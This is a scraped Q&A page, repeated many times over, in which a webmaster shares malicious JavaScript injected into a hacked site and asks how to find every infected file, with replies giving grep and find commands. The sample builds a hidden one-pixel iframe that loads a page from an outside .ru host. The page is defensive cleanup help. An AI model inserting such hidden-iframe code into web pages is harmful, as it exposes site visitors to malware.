find “an expression” on each file of a directory recursively
Clash Royale CLAN TAG#URR8PPP
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty margin-bottom:0;
1
One of my website on my webserver has suffered an attack : code injection.
Here is the malicious code :
<script type="text/javascript" language="javascript">
(function ()
var t = document.createElement('iframe');
t.src = 'http://ahtiagge.ru/count27.php';
t.style.position = 'absolute';
t.style.border = '0';
t.style.height = '1px';
t.style.width = '1px';
t.style.left = '1px';
t.style.top = '1px';
if (!document.getElementById('t'))
document.write('<div id='t'></div>');
document.getElementById('t').appendChild(t);
)
();</script>
I want to know the name (and path) of all files coutains the expression on my server to stanch the contagion. Here is the expression i want to match :'http://ahtiagge.ru/count27.php'
I would like results like that :
/var/www/vhosts/site1.com/httpdocs/index.php
/var/www/vhosts/site1.com/httpdocs/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/and_sub/fileN.php
How can I solve this with a shell script ? is it possible ?
find recursive
edited Mar 9 at 14:39
Rui F Ribeiro
41.9k1483142
asked Dec 26 '12 at 14:25
RaphaëlRaphaël
3281415
add a comment |
1
One of my website on my webserver has suffered an attack : code injection.
Here is the malicious code :
<script type="text/javascript" language="javascript">
(function ()
var t = document.createElement('iframe');
t.src = 'http://ahtiagge.ru/count27.php';
t.style.position = 'absolute';
t.style.border = '0';
t.style.height = '1px';
t.style.width = '1px';
t.style.left = '1px';
t.style.top = '1px';
if (!document.getElementById('t'))
document.write('<div id='t'></div>');
document.getElementById('t').appendChild(t);
)
();</script>
I want to know the name (and path) of all files coutains the expression on my server to stanch the contagion. Here is the expression i want to match :'http://ahtiagge.ru/count27.php'
I would like results like that :
/var/www/vhosts/site1.com/httpdocs/index.php
/var/www/vhosts/site1.com/httpdocs/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/and_sub/fileN.php
How can I solve this with a shell script ? is it possible ?
find recursive
edited Mar 9 at 14:39
Rui F Ribeiro
41.9k1483142
asked Dec 26 '12 at 14:25
RaphaëlRaphaël
3281415
1
would a simplegrep -rl 'http://ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/*work for you?
– Drake Clarris
Dec 26 '12 at 14:47
can I redirect the output in a file like grep -rl 'ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/* > scran.txt ?
– Raphaël
Dec 26 '12 at 14:48
yeah of course.
– Drake Clarris
Dec 26 '12 at 14:54
2
careful, Raphaël, you added a ";" after "php'" which shouldn't be here : it would separate the command into 2 commands, the 2nd one launching "/var/www/...../site1.com" with arguments "/httpdocs/*" ... just drop the ";".
– Olivier Dulac
Dec 26 '12 at 16:08
ha good catch didn't see that
– Drake Clarris
Dec 26 '12 at 16:25
add a comment |
1
1
1
One of my website on my webserver has suffered an attack : code injection.
Here is the malicious code :
<script type="text/javascript" language="javascript">
(function ()
var t = document.createElement('iframe');
t.src = 'http://ahtiagge.ru/count27.php';
t.style.position = 'absolute';
t.style.border = '0';
t.style.height = '1px';
t.style.width = '1px';
t.style.left = '1px';
t.style.top = '1px';
if (!document.getElementById('t'))
document.write('<div id='t'></div>');
document.getElementById('t').appendChild(t);
)
();</script>
I want to know the name (and path) of all files coutains the expression on my server to stanch the contagion. Here is the expression i want to match :'http://ahtiagge.ru/count27.php'
I would like results like that :
/var/www/vhosts/site1.com/httpdocs/index.php
/var/www/vhosts/site1.com/httpdocs/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/and_sub/fileN.php
How can I solve this with a shell script ? is it possible ?
find recursive
edited Mar 9 at 14:39
Rui F Ribeiro
41.9k1483142
asked Dec 26 '12 at 14:25
RaphaëlRaphaël
3281415
One of my website on my webserver has suffered an attack : code injection.
Here is the malicious code :
<script type="text/javascript" language="javascript">
(function ()
var t = document.createElement('iframe');
t.src = 'http://ahtiagge.ru/count27.php';
t.style.position = 'absolute';
t.style.border = '0';
t.style.height = '1px';
t.style.width = '1px';
t.style.left = '1px';
t.style.top = '1px';
if (!document.getElementById('t'))
document.write('<div id='t'></div>');
document.getElementById('t').appendChild(t);
)
();</script>
I want to know the name (and path) of all files coutains the expression on my server to stanch the contagion. Here is the expression i want to match :'http://ahtiagge.ru/count27.php'
I would like results like that :
/var/www/vhosts/site1.com/httpdocs/index.php
/var/www/vhosts/site1.com/httpdocs/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/and_sub/fileN.php
How can I solve this with a shell script ? is it possible ?
find recursive
find recursive
edited Mar 9 at 14:39
Rui F Ribeiro
41.9k1483142
asked Dec 26 '12 at 14:25
RaphaëlRaphaël
3281415
edited Mar 9 at 14:39
Rui F Ribeiro
41.9k1483142
asked Dec 26 '12 at 14:25
RaphaëlRaphaël
3281415
edited Mar 9 at 14:39
Rui F Ribeiro
41.9k1483142
edited Mar 9 at 14:39
Rui F Ribeiro
41.9k1483142
edited Mar 9 at 14:39
Rui F Ribeiro
41.9k1483142
41.9k1483142
asked Dec 26 '12 at 14:25
RaphaëlRaphaël
3281415
asked Dec 26 '12 at 14:25
RaphaëlRaphaël
3281415
asked Dec 26 '12 at 14:25
RaphaëlRaphaël
3281415
3281415
1
would a simplegrep -rl 'http://ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/*work for you?
– Drake Clarris
Dec 26 '12 at 14:47
can I redirect the output in a file like grep -rl 'ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/* > scran.txt ?
– Raphaël
Dec 26 '12 at 14:48
yeah of course.
– Drake Clarris
Dec 26 '12 at 14:54
2
careful, Raphaël, you added a ";" after "php'" which shouldn't be here : it would separate the command into 2 commands, the 2nd one launching "/var/www/...../site1.com" with arguments "/httpdocs/*" ... just drop the ";".
– Olivier Dulac
Dec 26 '12 at 16:08
ha good catch didn't see that
– Drake Clarris
Dec 26 '12 at 16:25
add a comment |
1
would a simplegrep -rl 'http://ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/*work for you?
– Drake Clarris
Dec 26 '12 at 14:47
can I redirect the output in a file like grep -rl 'ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/* > scran.txt ?
– Raphaël
Dec 26 '12 at 14:48
yeah of course.
– Drake Clarris
Dec 26 '12 at 14:54
2
careful, Raphaël, you added a ";" after "php'" which shouldn't be here : it would separate the command into 2 commands, the 2nd one launching "/var/www/...../site1.com" with arguments "/httpdocs/*" ... just drop the ";".
– Olivier Dulac
Dec 26 '12 at 16:08
ha good catch didn't see that
– Drake Clarris
Dec 26 '12 at 16:25
1
1
would a simple
grep -rl 'http://ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/* work for you?– Drake Clarris
Dec 26 '12 at 14:47
would a simple
grep -rl 'http://ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/* work for you?– Drake Clarris
Dec 26 '12 at 14:47
can I redirect the output in a file like grep -rl 'ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/* > scran.txt ?
– Raphaël
Dec 26 '12 at 14:48
can I redirect the output in a file like grep -rl 'ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/* > scran.txt ?
– Raphaël
Dec 26 '12 at 14:48
yeah of course.
– Drake Clarris
Dec 26 '12 at 14:54
yeah of course.
– Drake Clarris
Dec 26 '12 at 14:54
2
2
careful, Raphaël, you added a ";" after "php'" which shouldn't be here : it would separate the command into 2 commands, the 2nd one launching "/var/www/...../site1.com" with arguments "/httpdocs/*" ... just drop the ";".
– Olivier Dulac
Dec 26 '12 at 16:08
careful, Raphaël, you added a ";" after "php'" which shouldn't be here : it would separate the command into 2 commands, the 2nd one launching "/var/www/...../site1.com" with arguments "/httpdocs/*" ... just drop the ";".
– Olivier Dulac
Dec 26 '12 at 16:08
ha good catch didn't see that
– Drake Clarris
Dec 26 '12 at 16:25
ha good catch didn't see that
– Drake Clarris
Dec 26 '12 at 16:25
add a comment |
2 Answers
2
active
oldest
votes
2
You can simply use grep for the same
grep -RP "http://ahtiagge.ru/count27.php" /var/www/vhosts/
or only check in *.php files only with the help of find
find /var/www/vhosts/ -name "*.php" -print | xargs grep -P "http://ahtiagge.ru/count27.php"
answered Dec 26 '12 at 14:48
Rahul PatilRahul Patil
15.2k186084
add a comment |
1
I like this command:
grep -i -n -I -H -R --include="*.php" -E "some_expression" .
Cheers.
answered Dec 26 '12 at 14:48
Dr BecoDr Beco
436315
add a comment |
Your Answer
StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "106"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);
else
createEditor();
);
function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);
);
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f59474%2ffind-an-expression-on-each-file-of-a-directory-recursively%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
2 Answers
2
active
oldest
votes
2 Answers
2
active
oldest
votes
active
oldest
votes
active
oldest
votes
2
You can simply use grep for the same
grep -RP "http://ahtiagge.ru/count27.php" /var/www/vhosts/
or only check in *.php files only with the help of find
find /var/www/vhosts/ -name "*.php" -print | xargs grep -P "http://ahtiagge.ru/count27.php"
answered Dec 26 '12 at 14:48
Rahul PatilRahul Patil
15.2k186084
add a comment |
2
You can simply use grep for the same
grep -RP "http://ahtiagge.ru/count27.php" /var/www/vhosts/
or only check in *.php files only with the help of find
find /var/www/vhosts/ -name "*.php" -print | xargs grep -P "http://ahtiagge.ru/count27.php"
answered Dec 26 '12 at 14:48
Rahul PatilRahul Patil
15.2k186084
add a comment |
2
2
2
You can simply use grep for the same
grep -RP "http://ahtiagge.ru/count27.php" /var/www/vhosts/
or only check in *.php files only with the help of find
find /var/www/vhosts/ -name "*.php" -print | xargs grep -P "http://ahtiagge.ru/count27.php"
answered Dec 26 '12 at 14:48
Rahul PatilRahul Patil
15.2k186084
You can simply use grep for the same
grep -RP "http://ahtiagge.ru/count27.php" /var/www/vhosts/
or only check in *.php files only with the help of find
find /var/www/vhosts/ -name "*.php" -print | xargs grep -P "http://ahtiagge.ru/count27.php"
answered Dec 26 '12 at 14:48
Rahul PatilRahul Patil
15.2k186084
answered Dec 26 '12 at 14:48
Rahul PatilRahul Patil
15.2k186084
answered Dec 26 '12 at 14:48
Rahul PatilRahul Patil
15.2k186084
answered Dec 26 '12 at 14:48
Rahul PatilRahul Patil
15.2k186084
15.2k186084
add a comment |
add a comment |
1
I like this command:
grep -i -n -I -H -R --include="*.php" -E "some_expression" .
Cheers.
answered Dec 26 '12 at 14:48
Dr BecoDr Beco
436315
add a comment |
1
I like this command:
grep -i -n -I -H -R --include="*.php" -E "some_expression" .
Cheers.
answered Dec 26 '12 at 14:48
Dr BecoDr Beco
436315
add a comment |
1
1
1
I like this command:
grep -i -n -I -H -R --include="*.php" -E "some_expression" .
Cheers.
answered Dec 26 '12 at 14:48
Dr BecoDr Beco
436315
I like this command:
grep -i -n -I -H -R --include="*.php" -E "some_expression" .
Cheers.
answered Dec 26 '12 at 14:48
Dr BecoDr Beco
436315
answered Dec 26 '12 at 14:48
Dr BecoDr Beco
436315
answered Dec 26 '12 at 14:48
Dr BecoDr Beco
436315
answered Dec 26 '12 at 14:48
Dr BecoDr Beco
436315
436315
add a comment |
add a comment |
draft saved
draft discarded
Thanks for contributing an answer to Unix & Linux Stack Exchange!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f59474%2ffind-an-expression-on-each-file-of-a-directory-recursively%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
1
would a simple
grep -rl 'http://ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/*work for you?– Drake Clarris
Dec 26 '12 at 14:47
can I redirect the output in a file like grep -rl 'ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/* > scran.txt ?
– Raphaël
Dec 26 '12 at 14:48
yeah of course.
– Drake Clarris
Dec 26 '12 at 14:54
2
careful, Raphaël, you added a ";" after "php'" which shouldn't be here : it would separate the command into 2 commands, the 2nd one launching "/var/www/...../site1.com" with arguments "/httpdocs/*" ... just drop the ";".
– Olivier Dulac
Dec 26 '12 at 16:08
ha good catch didn't see that
– Drake Clarris
Dec 26 '12 at 16:25